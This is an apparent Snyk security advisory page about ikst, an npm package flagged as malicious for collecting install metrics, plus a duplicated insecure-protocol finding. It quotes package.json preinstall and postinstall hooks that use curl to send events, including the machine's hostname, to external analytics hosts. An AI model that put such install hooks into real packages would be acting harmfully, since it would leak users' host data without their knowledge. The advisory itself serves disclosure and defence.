ikst@0.0.1-security vulnerabilities

security holding package

Direct Vulnerabilities

Known vulnerabilities in the ikst package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Malicious Package

ikst is a malicious package that was used to collect download metrics beyond what npm provides, and sent them to google analytics or piwik. This can cause a privacy concern amongst users.

This is especially dangerous in production runtime environments, where environment variables tend to consist of keys, passwords, tokens and other secrets.

Example:

{
  "name": "npm_scripts_test_metrics",
  "scripts": {
    "preinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=....'",
    "postinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=....'"
  }
},
{
  "name": "subtitles-lib",
  "scripts": {
    "postinstall": "bash -c 'curl \"http://*****.piwikpro.com/piwik.php?idsite=3&rec=1&action_name=$HOSTNAME\"'"
  }
}

The list of packages and their scripts are:

npm_scripts_test_metrics
subtitles-lib
ikst
botbait
mktmpio
anarchy

How to fix Malicious Package?

Avoid usage of this package altogether.

*
  • H
Resources Downloaded over Insecure Protocol

ikst Affected versions of the package are vulnerable to Man in the Middle (MitM) attacks due to downloading resources over an insecure protocol. Without a secure connection, it is possible for an attacker to intercept this connection and alter the packages received. In serious cases, this may even lead to Remote Code Execution (RCE) on your host server.

You can read more about Resources Downloaded over Insecure Protocol on our blog.

How to fix Resources Downloaded over Insecure Protocol?

Upgrade ikst to version 1.1.2 or higher.

<1.1.2
  • H
Resources Downloaded over Insecure Protocol

ikst Affected versions of the package are vulnerable to Man in the Middle (MitM) attacks due to downloading resources over an insecure protocol. Without a secure connection, it is possible for an attacker to intercept this connection and alter the packages received. In serious cases, this may even lead to Remote Code Execution (RCE) on your host server.

You can read more about Resources Downloaded over Insecure Protocol on our blog.

How to fix Resources Downloaded over Insecure Protocol?

Upgrade ikst to version 1.1.2 or higher.

<1.1.2